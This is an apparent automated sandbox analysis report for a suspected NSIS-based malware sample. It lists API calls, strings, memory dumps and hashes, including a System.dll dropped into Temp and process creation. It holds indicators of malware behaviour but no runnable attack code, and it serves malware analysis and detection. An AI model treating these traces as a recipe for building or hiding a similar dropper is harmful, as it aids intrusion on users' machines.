                                        • VerQueryValueA.VERSION(?,00409014,?,?,?,?,?,00000000), ref: 00401F3B
                                          • Part of subcall function 00405C94: wsprintfA.USER32 ref: 00405CA1
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                        • String ID:
                                        • API String ID: 1404258612-0
                                        • Opcode ID: ec7151e13ff031cd6146c14c1100c40685b360c9b493fb258c96d19e35a9089b
                                        • Instruction ID: 9791f4c70c1528f8983e13c97e2cb0ced061aec02aec85b9ff59acd402aedfa8
                                        • Opcode Fuzzy Hash: ec7151e13ff031cd6146c14c1100c40685b360c9b493fb258c96d19e35a9089b
                                        • Instruction Fuzzy Hash: A0117071901209BEDF01EFA5DD85DAEBBB9EF04344B20807AF505F61A1D7388E55DB28
                                        APIs
                                        • CharNextA.USER32(?,?,Invaliditetsprocent209\indoktrineringen.rec,?,004058CB,Invaliditetsprocent209\indoktrineringen.rec,Invaliditetsprocent209\indoktrineringen.rec,?,?,77462EE0,00405616,?,C:\Users\user\AppData\Local\Temp\,77462EE0,00000000), ref: 0040586D
                                        • CharNextA.USER32(00000000), ref: 00405872
                                        • CharNextA.USER32(00000000), ref: 00405886
                                        Strings
                                        • Invaliditetsprocent209\indoktrineringen.rec, xrefs: 00405860
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: CharNext
                                        • String ID: Invaliditetsprocent209\indoktrineringen.rec
                                        • API String ID: 3213498283-2173611331
                                        • Opcode ID: 2ea991d7d7ffd85479a521eab3fc1e567f9f9a9fdda000af801139d1d19966a1
                                        • Instruction ID: 725a23b4e930c3b6c27a7d0cd0e333612dd42f6c53d199a680129a9385ae8045
                                        • Opcode Fuzzy Hash: 2ea991d7d7ffd85479a521eab3fc1e567f9f9a9fdda000af801139d1d19966a1
                                        • Instruction Fuzzy Hash: 74F06253914F516AFB3276645C44B7B5A8CCF56361F188477EE40A62C2C2BC4C618F9A
                                        APIs
                                        • IsWindowVisible.USER32(?), ref: 00404FC2
                                        • CallWindowProcA.USER32(?,?,?,?), ref: 00405013
                                          • Part of subcall function 00404038: SendMessageA.USER32(00010448,00000000,00000000,00000000), ref: 0040404A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: Window$CallMessageProcSendVisible
                                        • String ID:
                                        • API String ID: 3748168415-3916222277
                                        • Opcode ID: a1366604d20516d7a227b416e124a8c8ccbf6a8c92e3cea699473ae65b9a4b61
                                        • Instruction ID: 01da3f5901ddaf9404fa7d81b8fd4ad62d8e53e58d7af57a61279808ed2d7cb1
                                        • Opcode Fuzzy Hash: a1366604d20516d7a227b416e124a8c8ccbf6a8c92e3cea699473ae65b9a4b61
                                        • Instruction Fuzzy Hash: EA018F7110020DABDF209F11DC85E9F3B6AF784758F208037FA04752D1D77A8C92AAAE
                                        APIs
                                          • Part of subcall function 00405D36: lstrcpynA.KERNEL32(?,?,00000400,00403287,00422F00,NSIS Error), ref: 00405D43
                                          • Part of subcall function 0040585F: CharNextA.USER32(?,?,Invaliditetsprocent209\indoktrineringen.rec,?,004058CB,Invaliditetsprocent209\indoktrineringen.rec,Invaliditetsprocent209\indoktrineringen.rec,?,?,77462EE0,00405616,?,C:\Users\user\AppData\Local\Temp\,77462EE0,00000000), ref: 0040586D
                                          • Part of subcall function 0040585F: CharNextA.USER32(00000000), ref: 00405872
                                          • Part of subcall function 0040585F: CharNextA.USER32(00000000), ref: 00405886
                                        • lstrlenA.KERNEL32(Invaliditetsprocent209\indoktrineringen.rec,00000000,Invaliditetsprocent209\indoktrineringen.rec,Invaliditetsprocent209\indoktrineringen.rec,?,?,77462EE0,00405616,?,C:\Users\user\AppData\Local\Temp\,77462EE0,00000000), ref: 00405907
                                        • GetFileAttributesA.KERNEL32(Invaliditetsprocent209\indoktrineringen.rec,Invaliditetsprocent209\indoktrineringen.rec,Invaliditetsprocent209\indoktrineringen.rec,Invaliditetsprocent209\indoktrineringen.rec,Invaliditetsprocent209\indoktrineringen.rec,Invaliditetsprocent209\indoktrineringen.rec,00000000,Invaliditetsprocent209\indoktrineringen.rec,Invaliditetsprocent209\indoktrineringen.rec,?,?,77462EE0,00405616,?,C:\Users\user\AppData\Local\Temp\,77462EE0), ref: 00405917
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Similarity
                                        • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                        • String ID: Invaliditetsprocent209\indoktrineringen.rec
                                        • API String ID: 3248276644-2173611331
                                        APIs
                                        • lstrlenA.KERNEL32(00000000,00000011), ref: 004024EF
                                        • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nszBD12.tmp\System.dll,00000000,?,?,00000000,00000011), ref: 0040250E
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\nszBD12.tmp\System.dll, xrefs: 004024DD, 00402502
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Similarity
                                        • API ID: FileWritelstrlen
                                        • String ID: C:\Users\user\AppData\Local\Temp\nszBD12.tmp\System.dll
                                        • API String ID: 427699356-1112140929
                                        APIs
                                        • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00421500,Error launching installer), ref: 0040550E
                                        • CloseHandle.KERNEL32(?), ref: 0040551B
                                        Strings
                                        • Error launching installer, xrefs: 004054F8
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Similarity
                                        • API ID: CloseCreateHandleProcess
                                        • String ID: Error launching installer
                                        • API String ID: 3712363035-66219284
                                        APIs
                                        • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,77462EE0,004036C9,77463410,004034D6,?), ref: 0040370C
                                        • GlobalFree.KERNEL32(006D20D8), ref: 00403713
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00403704
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Similarity
                                        • API ID: Free$GlobalLibrary
                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                        • API String ID: 1100898210-787714339
                                        APIs
                                        • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CE5,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\fJuwM4Bwi7.exe,C:\Users\user\Desktop\fJuwM4Bwi7.exe,80000000,00000003), ref: 00405813
                                        • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CE5,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\fJuwM4Bwi7.exe,C:\Users\user\Desktop\fJuwM4Bwi7.exe,80000000,00000003), ref: 00405821
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Similarity
                                        • API ID: CharPrevlstrlen
                                        • String ID: C:\Users\user\Desktop
                                        • API String ID: 2709904686-3443045126
                                        APIs
                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 1000115B
                                        • GlobalFree.KERNEL32(00000000), ref: 100011B4
                                        • GlobalFree.KERNEL32(?), ref: 100011C7
                                        • GlobalFree.KERNEL32(?), ref: 100011F5
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79058661791.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                        Similarity
                                        • API ID: Global$Free$Alloc
                                        • String ID:
                                        • API String ID: 1780285237-0
                                        APIs
                                        • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B5B,00000000,[Rename],00000000,00000000,00000000), ref: 0040593C
                                        • lstrcmpiA.KERNEL32(00405B5B,00000000), ref: 00405954
                                        • CharNextA.USER32(00405B5B,?,00000000,00405B5B,00000000,[Rename],00000000,00000000,00000000), ref: 00405965
                                        • lstrlenA.KERNEL32(00405B5B,?,00000000,00405B5B,00000000,[Rename],00000000,00000000,00000000), ref: 0040596E
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.79053641923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Similarity
                                        • API ID: lstrlen$CharNextlstrcmpi
                                        • String ID:
                                        • API String ID: 190613189-0

                                        Execution Graph

                                        Execution Coverage:0%
                                        Dynamic/Decrypted Code Coverage:100%
                                        Signature Coverage:34.7%
                                        Total number of Nodes:95
                                        Total number of Limit Nodes:0

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 0 32952b90-32952b9c LdrInitializeThunk
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1 329534e0-329534ec LdrInitializeThunk
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        Similarity
                                        • API ID: DebugPrintTimes
                                        • String ID: $ $0

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmp
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: DebugPrintTimes
                                        • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap

                                        APIs
                                        • RtlDebugPrintTimes.NTDLL ref: 3290651C
                                          • Part of subcall function 32906565: RtlDebugPrintTimes.NTDLL ref: 32906614
                                          • Part of subcall function 32906565: RtlDebugPrintTimes.NTDLL ref: 3290665F
                                        Strings
                                        • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 3296977C
                                        • LdrpInitShimEngine, xrefs: 32969783, 32969796, 329697BF
                                        • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 329697B9
                                        • Getting the shim engine exports failed with status 0x%08lx, xrefs: 32969790
                                        • apphelp.dll, xrefs: 32906446
                                        • minkernel\ntdll\ldrinit.c, xrefs: 329697A0, 329697C9
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmp
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: DebugPrintTimes
                                        • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmp
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                        APIs
                                        • RtlDebugPrintTimes.NTDLL ref: 3293D879
                                          • Part of subcall function 32914779: RtlDebugPrintTimes.NTDLL ref: 32914817
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmp
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: DebugPrintTimes
                                        • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                        Strings
                                        • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 3290D06F
                                        • @, xrefs: 3290D09D
                                        • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 3290D0E6
                                        • Control Panel\Desktop\LanguageConfiguration, xrefs: 3290D136
                                        • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 3290D263
                                        • @, xrefs: 3290D2B3
                                        • @, xrefs: 3290D24F
                                        • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 3290D202
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmp
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmp
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: HEAP: $HEAP[%wZ]: $Invalid CommitSize parameter - %Ix$Invalid ReserveSize parameter - %Ix$May not specify Lock parameter with HEAP_NO_SERIALIZE$Specified HeapBase (%p) != to BaseAddress (%p)$Specified HeapBase (%p) invalid, Status = %lx$Specified HeapBase (%p) is free or not writable
                                        Strings
                                        • LdrpDynamicShimModule, xrefs: 3297A7A5
                                        • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 3297A79F
                                        • apphelp.dll, xrefs: 32932382
                                        • minkernel\ntdll\ldrinit.c, xrefs: 3297A7AF
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmp
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmp
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmp
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                        Strings
                                        • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 32981F8A
                                        • RtlGetAssemblyStorageRoot, xrefs: 32981F6A, 32981FA4, 32981FC4
                                        • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 32981F82
                                        • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 32981FC9
                                        • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 32981FA9
                                        • SXS: %s() passed the empty activation context, xrefs: 32981F6F
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmp
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmp
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmp
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: DebugPrintTimes
                                        • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                        APIs
                                        Strings
                                        • LdrpInitializePerUserWindowsDirectory, xrefs: 329880E9
                                        • Failed to reallocate the system dirs string !, xrefs: 329880E2
                                        • minkernel\ntdll\ldrinit.c, xrefs: 329880F3
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmp
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: DebugPrintTimes
                                        • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                        • API String ID: 3446177414-1783798831
                                        APIs
                                        Strings
                                        • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 32994508
                                        • minkernel\ntdll\ldrredirect.c, xrefs: 32994519
                                        • LdrpCheckRedirection, xrefs: 3299450F
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmp
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: DebugPrintTimes
                                        • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                        • API String ID: 3446177414-3154609507
                                        Strings
                                        • WindowsExcludedProcs, xrefs: 3293514A
                                        • Kernel-MUI-Number-Allowed, xrefs: 32935167
                                        • Kernel-MUI-Language-SKU, xrefs: 3293534B
                                        • Kernel-MUI-Language-Allowed, xrefs: 3293519B
                                        • Kernel-MUI-Language-Disallowed, xrefs: 32935272
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmp
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                        • API String ID: 0-258546922
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmp
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                        • API String ID: 0-3061284088
                                        APIs
                                        Strings
                                        • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 32910586
                                        • kLsE, xrefs: 329105FE
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmp
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: DebugPrintTimes
                                        • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                        • API String ID: 3446177414-2547482624
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmp
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                        • API String ID: 0-379654539
                                        Strings
                                        • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 329820C0
                                        • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 32981FE3, 329820BB
                                        • .Local, xrefs: 329427F8
                                        • SXS: %s() passed the empty activation context, xrefs: 32981FE8
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmp
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                        • API String ID: 0-1239276146
                                        Strings
                                        • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 32970E72
                                        • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 32970DEC
                                        • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 32970EB5
                                        • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 32970E2F
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmp
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                        • API String ID: 0-1468400865
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
